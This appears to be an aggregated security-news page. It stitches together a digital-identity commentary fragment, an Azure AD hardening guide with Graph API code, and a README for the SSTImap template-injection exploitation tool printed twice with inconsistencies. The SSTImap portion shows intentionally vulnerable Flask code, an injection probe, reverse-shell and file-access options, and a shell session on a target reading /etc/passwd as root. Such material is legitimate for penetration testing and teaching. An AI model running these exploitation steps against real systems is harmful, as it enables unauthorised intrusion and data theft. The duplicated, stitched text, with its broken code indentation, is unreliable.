“The United States needs a national digital identity framework—but one built with a balance of security, privacy, and interoperability,” Dwyer told The Cipher Brief. “As threat actors increasingly target digital identities to compromise critical infrastructure, the stakes for getting identity right have never been higher.”

He emphasized that any framework must be built on multi-factor authentication, phishing resistance, cryptographic proofs, and decentralized systems—not centralized databases.

“Public-private collaboration is crucial: government agencies can serve as trusted identity verification sources (e.g., DMV, passport authorities), while the private sector can drive innovation in delivery and authentication,” Dwyer added. “A governance board with cross-sector representation should oversee policy and trust models.”

Digital identities are no longer just a privacy concern—they’re weapons, vulnerabilities, and battlegrounds in 21st-century conflict. As foreign adversaries grow more sophisticated and U.S. defenses lag behind, the question is no longer if, but how fast America can respond.



SSTImap - Automatic SSTI Detection Tool With Interactive Interface

By: Unknown

 

SSTImap is a penetration testing tool that checks websites for Code Injection and Server-Side Template Injection vulnerabilities and exploits them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using the Flask framework and the Jinja2 template engine. It integrates the user-supplied variable name in an unsafe way: the value is concatenated into the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # SSTI VULNERABILITY:
    template = f"Hello, {name}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Not only does this way of using templates create an XSS vulnerability, it also allows the attacker to inject template code that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello, John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello, 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    template = "Hello, {{name}}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different template engines.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check a URL, you can use the -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use the --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use the --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, use the -i argument. All other arguments, except those concerning exploitation payloads, are used as initial values for settings.

Some commands alter settings between test runs. To run a test, a target URL must be supplied via the initial -u argument or the url command. After that, you can use the run command to check the URL for SSTI.

If SSTI is found, commands can be used to start exploitation. You get the same exploitation capabilities as in predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Note that test results remain valid until the target URL is changed, so you can easily switch between exploitation methods without rerunning the detection test every time.

To get a full list of interactive commands, use the help command in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine                         | Base language
Mako                           | Python
Jinja2                         | Python
Python (code eval)             | Python
Tornado                        | Python
Nunjucks                       | JavaScript
Pug                            | JavaScript
doT                            | JavaScript
Marko                          | JavaScript
JavaScript (code eval)         | JavaScript
Dust (<= dustjs-helpers@1.5.0) | JavaScript
EJS                            | JavaScript
Ruby (code eval)               | Ruby
Slim                           | Ruby
ERB                            | Ruby
Smarty (unsecured)             | PHP
Smarty (secured)               | PHP
PHP (code eval)                | PHP
Twig (<=1.19)                  | PHP
Freemarker                     | Java
Velocity                       | Java
Twig (>1.19)                   | not exploitable (no supported capabilities)
Dust (> dustjs-helpers@1.5.0)  | not exploitable (no supported capabilities)

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, let me know first, to avoid duplicating work that I or other contributors may already be doing.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


SSTImap - Automatic SSTI Detection Tool With Interactive Interface

By: Unknown

 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use the --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
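
For one-off commands, the --os-cmd option listed above can be used instead of a full shell. A sketch, with the banner and detection output abridged and the result illustrative:

$ ./sstimap.py -u https://example.com/page?name=John --os-cmd whoami
...
root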

To get a full list of options, use the --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, use the -i argument. All other arguments, except those regarding exploitation payloads, are used as initial values for settings.

Some commands alter settings between test runs. To run a test, the target URL must be supplied via the initial -u argument or the url command. After that, you can use the run command to check the URL for SSTI.

If SSTI is found, commands can be used to start exploitation. You get the same exploitation capabilities as in predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Test results remain valid until the target URL is changed, so you can easily switch between exploitation methods without re-running the detection test every time.

To get a full list of interactive commands, use the help command in interactive mode.
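
A minimal session might look like the sketch below; it uses only the url and run commands described above, and the prompt and status messages are illustrative rather than exact tool output:

$ ./sstimap.py -i
...
> url https://example.com/page?name=John
> run
[*] Testing if GET parameter 'name' is injectable
...
[+] SSTImap identified the following injection point:
...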

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine                          RCE  Blind  Code evaluation  File read  File write
Mako                            ✓    ✓      Python           ✓          ✓
Jinja2                          ✓    ✓      Python           ✓          ✓
Python (code eval)              ✓    ✓      Python           ✓          ✓
Tornado                         ✓    ✓      Python           ✓          ✓
Nunjucks                        ✓    ✓      JavaScript       ✓          ✓
Pug                             ✓    ✓      JavaScript       ✓          ✓
doT                             ✓    ✓      JavaScript       ✓          ✓
Marko                           ✓    ✓      JavaScript       ✓          ✓
JavaScript (code eval)          ✓    ✓      JavaScript       ✓          ✓
Dust (<= dustjs-helpers@1.5.0)  ✓    ✓      JavaScript       ✓          ✓
EJS                             ✓    ✓      JavaScript       ✓          ✓
Ruby (code eval)                ✓    ✓      Ruby             ✓          ✓
Slim                            ✓    ✓      Ruby             ✓          ✓
ERB                             ✓    ✓      Ruby             ✓          ✓
Smarty (unsecured)              ✓    ✓      PHP              ✓          ✓
Smarty (secured)                ✓    ✓      PHP              ✓          ✓
PHP (code eval)                 ✓    ✓      PHP              ✓          ✓
Twig (<=1.19)                   ✓    ✓      PHP              ✓          ✓
Freemarker                      ✓    ✓      Java             ✓          ✓
Velocity                        ✓    ✓      Java             ✓          ✓
Twig (>1.19)                    ×    ×      ×                ×          ×
Dust (> dustjs-helpers@1.5.0)   ×    ×      ×                ×          ×

Burp Suite Plugin

Currently, Burp Suite only supports Jython as a way to execute Python 2 and does not provide Python 3 functionality, so the extension remains unavailable.

Future plans

If you plan to contribute something big from this list, let me know first, so that we avoid duplicating work already underway by me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


8 Things to Avoid In Azure Active Directory

By: tribe47

Organizations that don’t put in the extra effort needed to secure their Azure Active Directory leave themselves vulnerable and open to data leaks, unauthorized data access, and cyberattacks targeting their infrastructure.

Cybercriminals can decrypt user passwords and compromise administrator accounts by hacking into Azure AD Connect, the service that synchronizes Azure AD with Windows AD servers. Once inside the system, the attackers can exfiltrate and encrypt an organization’s most sensitive data.

Azure AD users often overlook crucial steps, such as implementing multi-factor authentication for all users joining the Active Directory with a device. Failure to require MFA makes it easier for an attacker to join a malicious device to an organization using the credentials of a compromised account.

Increased security risk isn’t the only consequence of a poorly set up AD. Misconfigurations can cause process bottlenecks leading to poor performance. The following guide was created by CQURE’s cybersecurity expert Michael Grafnetter, who specializes in securing Azure Active Directory, to help you detect and remedy some of the most common Azure AD misconfiguration mistakes.

1. Production Tenants Used for Tests

During security assessments, we often see production tenants being used by developers for testing their “Hello World” apps. We recommend that companies have standalone tenants for testing new apps and settings. Needless to say, the amount of PII accessible through such tenants should be minimized.

2. Overpopulated Global Admins

User accounts that are assigned the Global Administrator role have unlimited control over your Azure AD tenant and, in many cases, also over your on-prem AD forest. Consider using less privileged roles to delegate permissions. For example, security auditors should be fine with the Security Reader or Global Reader role.
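
One way to keep this in check is to enumerate the role’s members programmatically and review the list on a schedule. Below is a minimal sketch using Python and the Microsoft Graph REST API; it assumes an OAuth access token with the Directory.Read.All permission is available in a GRAPH_TOKEN environment variable (a placeholder name, not an official convention):

import os
import requests

# Placeholder: an access token with Directory.Read.All is assumed here.
headers = {"Authorization": f"Bearer {os.environ['GRAPH_TOKEN']}"}
base = "https://graph.microsoft.com/v1.0"

# List the directory roles activated in the tenant and find Global Administrator
# (the role only appears here once it has been activated).
roles = requests.get(f"{base}/directoryRoles", headers=headers).json()["value"]
ga = next(r for r in roles if r["displayName"] == "Global Administrator")

# Enumerate the role's members; an unexpectedly long list is a red flag.
members = requests.get(f"{base}/directoryRoles/{ga['id']}/members",
                       headers=headers).json()["value"]
for m in members:
    print(m.get("displayName"), m.get("userPrincipalName"))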

3. Not Enforcing MFA

Company administrators tend to create “temporary” MFA exclusions for selected accounts and then forget about them, making them permanent. Due to misconfigurations, trusted IP address ranges sometimes even include guest WiFi networks. Even with the free tier of Azure AD, Security defaults can be used to enable multi-factor authentication for all users, and accounts assigned the Global Administrator role can be required to use multi-factor authentication at all times.
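
On the free tier, Security defaults can also be enabled programmatically. A hedged sketch against the Microsoft Graph security defaults policy endpoint, reusing the GRAPH_TOKEN placeholder from the previous example (the token needs a policy-write permission such as Policy.ReadWrite.ConditionalAccess):

import os
import requests

headers = {
    "Authorization": f"Bearer {os.environ['GRAPH_TOKEN']}",  # placeholder token
    "Content-Type": "application/json",
}

# Enabling security defaults turns on MFA-related protections tenant-wide.
resp = requests.patch(
    "https://graph.microsoft.com/v1.0/policies/identitySecurityDefaultsEnforcementPolicy",
    headers=headers,
    json={"isEnabled": True},
)
resp.raise_for_status()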

4. Overprivileged Applications

Many applications registered in Azure AD are assigned much stronger privileges than they actually require. It is also not obvious that app owners can impersonate their applications, which sometimes leads to privilege escalation. Registered applications and service principals should be regularly audited, as they can be used by malicious actors as persistent backdoors to the tenant.
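
A periodic audit can start from the tenant-wide delegated permission grants. The sketch below reuses the GRAPH_TOKEN placeholder and applies a simple heuristic for broad scopes; treat it as a starting point rather than an exhaustive check:

import os
import requests

headers = {"Authorization": f"Bearer {os.environ['GRAPH_TOKEN']}"}  # placeholder

# Delegated OAuth2 permission grants across the tenant.
grants = requests.get(
    "https://graph.microsoft.com/v1.0/oauth2PermissionGrants",
    headers=headers,
).json()["value"]

# Heuristic: flag grants whose scopes allow broad directory-wide access.
for g in grants:
    scopes = (g.get("scope") or "").split()
    risky = [s for s in scopes
             if s.endswith(".ReadWrite.All") or s.startswith("Directory.")]
    if risky:
        print(g["clientId"], g["consentType"], risky)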

5. Fire-and-Forget Approach to Configuration

Azure AD is constantly evolving and new security features are introduced regularly. But many of these newly added features need to be enabled and configured before they can be used, including the super-cool passwordless authentication methods. Azure AD deployment should therefore not be considered a one-time operation but rather a continuous process.

6. Insecure Azure AD Connect Servers

Azure AD Connect servers are used to synchronize Azure AD with on-premises AD, for which they need permissions to perform modifications in both environments. This fact is well-known to hackers, who might misuse AAD Connect to compromise the entire organization. These servers should therefore be considered Tier 0 resources and only Domain Admins should have administrative rights on them.

7. Lack of Monitoring

Even with an Azure AD Premium plan, user activity logs are only stored for 30 days. Is this default behavior really enough for your organization? Luckily, custom retention policies can be configured when Azure AD logs are forwarded to the Azure Log Analytics service, to the Unified Audit Log feature of Microsoft 365, or to 3rd-party SIEM solutions. And components like Azure AD Identity Protection or Azure Sentinel can automatically detect anomalies in user activity.
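
Once sign-in logs are forwarded to a Log Analytics workspace, retention is no longer capped at 30 days and the data becomes queryable from code. A minimal sketch using the azure-monitor-query and azure-identity packages, with WORKSPACE_ID as a placeholder for your workspace ID:

from datetime import timedelta

from azure.identity import DefaultAzureCredential
from azure.monitor.query import LogsQueryClient

client = LogsQueryClient(DefaultAzureCredential())

# Count sign-ins per user over the last 90 days -- a window that already
# exceeds the default 30-day retention of Azure AD itself.
response = client.query_workspace(
    workspace_id="WORKSPACE_ID",  # placeholder
    query="SigninLogs | summarize count() by UserPrincipalName | top 20 by count_",
    timespan=timedelta(days=90),
)
for table in response.tables:
    for row in table.rows:
        print(row)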

8. Default Settings

Not all default settings provide the highest possible security. By default, users can register 3rd-party applications in Azure AD, passwordless authentication methods are disabled, and ADFS endpoints with NTLM authentication, which bypasses the Extranet Smart Lockout feature, are published on proxies. These and other settings should be reviewed during Azure AD deployment and adjusted to fit organizational security policies.
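
Reviewing defaults can likewise be automated. For instance, the default that lets any user register applications can be switched off through the Graph authorization policy; a sketch, again with the GRAPH_TOKEN placeholder and requiring a policy-write permission such as Policy.ReadWrite.Authorization:

import os
import requests

headers = {
    "Authorization": f"Bearer {os.environ['GRAPH_TOKEN']}",  # placeholder token
    "Content-Type": "application/json",
}

# Turn off the default that allows any user to register applications.
resp = requests.patch(
    "https://graph.microsoft.com/v1.0/policies/authorizationPolicy",
    headers=headers,
    json={"defaultUserRolePermissions": {"allowedToCreateApps": False}},
)
resp.raise_for_status()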

Azure AD is a critical attack surface that needs continuous monitoring for misconfigurations. We hope this guide makes managing the security of your AD easier by helping you to detect and resolve vulnerabilities.

The post 8 Things to Avoid In Azure Active Directory appeared first on CQURE Academy.

The Best Tools for Secure Online Privacy

By: IG GURU
Since the emergence of the COVID-19 pandemic, most businesses and individuals have embraced remote working. However, with more people working from home, the issue of online privacy has taken precedence. Now more than ever, everyone is concerned about their privacy on online platforms like WhatsApp and Facebook. In this article, we explore solutions to […]